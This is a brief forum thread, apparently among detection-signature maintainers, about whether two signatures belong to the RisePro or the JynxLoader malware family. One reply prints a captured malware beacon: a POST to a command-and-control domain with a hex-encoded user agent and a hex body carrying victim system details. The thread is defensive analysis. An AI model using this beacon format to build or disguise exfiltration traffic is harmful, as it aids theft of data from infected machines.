Hi, there seems to be a little confusion with signatures 2049660 & 2049661, the fact is that it was written in RisePro because the magic and the encrypted bytes 0x36 match its traffic.
Best regards, Jane ˶ᵔ ᵕ ᵔ˶
3 Likes
hey Jane!
Thanks for the tip! I originally gave these the JynxLoader names because I saw the traffic stem from d4d464e22776e552d215e5fe39373280 which had the following HTTP request. Notice that the User-Agent is the hex encoded string “JinxV2DEV”.
I just read up on RisePro on the any.run blog and it was very helpful. I’ll get these names updated in today’s release.
POST / HTTP/1.1
Host: essentialdrivers.org
User-Agent: 4a696e785632444556
Content-Length: 234
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
30303430353232383637323737623062363434363836326433333262356637397c33352e3139322e39332e3130377c55537c496e74656c28522920436f726528544d2932204350552036363030204020322e34302047487a7c505441434d3242347c31307c57696e646f777320446566656e646572
Happy Holidays! 
2 Likes